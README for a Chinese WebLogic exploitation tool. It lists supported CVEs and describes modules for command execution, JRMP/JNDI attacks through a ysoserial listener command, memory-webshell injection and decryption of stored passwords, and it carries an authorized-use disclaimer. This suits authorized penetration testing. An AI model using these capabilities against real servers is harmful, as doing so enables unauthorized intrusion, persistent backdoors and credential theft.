└── README.md
/README.md:
--------------------------------------------------------------------------------
1 | # WeblogicTool
2 | ## 简介
3 | 迫于目前现有的weblogic工具没怎么更新、payloayjdk适用版本等问题,所以基于superman18、sp4zcmd等项目,写一个weblogic工具,工具运行版本要求jdk 8(深信服深蓝实验室天威战队强力驱动)
4 |
5 | ## 免责声明
6 | 本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束
7 |
8 | ## 支持漏洞
9 | ```
10 | CVE-2023-21931(JNDI)
11 | CVE-2023-21839(JNDI)
12 | CVE-2020-2551(JRMP)
13 | CVE-2020-2551
14 | CVE-2020-2555
15 | CVE-2020-2883
16 | CVE-2020-14882 未授权访问
17 | CVE-2018-2894
18 | CVE-2018-2628(JRMP)
19 | CVE-2018-2893(JRMP)
20 | CVE-2018-3245(JRMP)
21 | CVE_2018_3252(JRMP)
22 | CVE_2018_3191
23 | CVE-2016-3510
24 | CVE-2016-0638
25 | CVE-2017-10271
26 | CVE-2017-3248(JRMP)
27 | CVE-2015-4852
28 | ......
29 | ```
30 |
31 | ## 漏洞检测
32 | 支持最近的CVE-2023-21839漏洞T3&&IIOP,JNDI和JRMP类型漏洞需要填写自定义的dnslog地址,防止waf拦截常用的dnslog域名
33 |
34 | ## 命令执行
35 | 先检测漏洞是否存在
36 |
37 |
38 |
39 | ECHO类型漏洞,支持执行命令,支持自定义返回数据编码格式
40 |
41 |
42 |
43 | ## JRMP攻击
44 | jrmp类型的漏洞只能使用jrmp模块进行攻击,在vps上使用yso启动jrmp,工具中填入vps的jrmp地址即可
45 |
46 | ```java -cp ./ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 'touch /tmp/1.txt' ```
47 |
48 |
49 |
50 | ## JNDI
51 | 与jrmp漏洞使用方法一样,需要启动vps服务端
52 |
53 | ## 内存马注入
54 | 目前支持哥斯拉4 Servlet Filter、冰蝎3.11 Servlet、蚁剑Custom Filter
55 | 
56 | 
57 |
58 | ## 密码解密
59 | 说明
60 | 1. 支持Weblogic 3DES和AES解密
61 | 2. 由于bcprov jar包签名问题,所以首次解密会出现异常:PBEWITHSHAAND128BITRC2-CBC SecretKeyFactory not available。需要手动下载 ```https://repo1.maven.org/maven2/org/bouncycastle/bcprov-jdk15on/1.56/bcprov-jdk15on-1.56.jar``` 然后将文件存在本地安装的JDK路径下,例如 ```E:\Java\jdk1.8.0_60\jre\lib\ext```
62 | 
63 |
64 |
65 | ## 协议探测
66 | 目前支持批量探测T3、IIOP协议开放状态,内网IP地址(IIOP实现),常见的接口
67 |
68 |
69 |
70 | ## Star趋势
71 | [](https://star-history.com/#KimJun1010/WeblogicTool&Date)
72 |
73 |
--------------------------------------------------------------------------------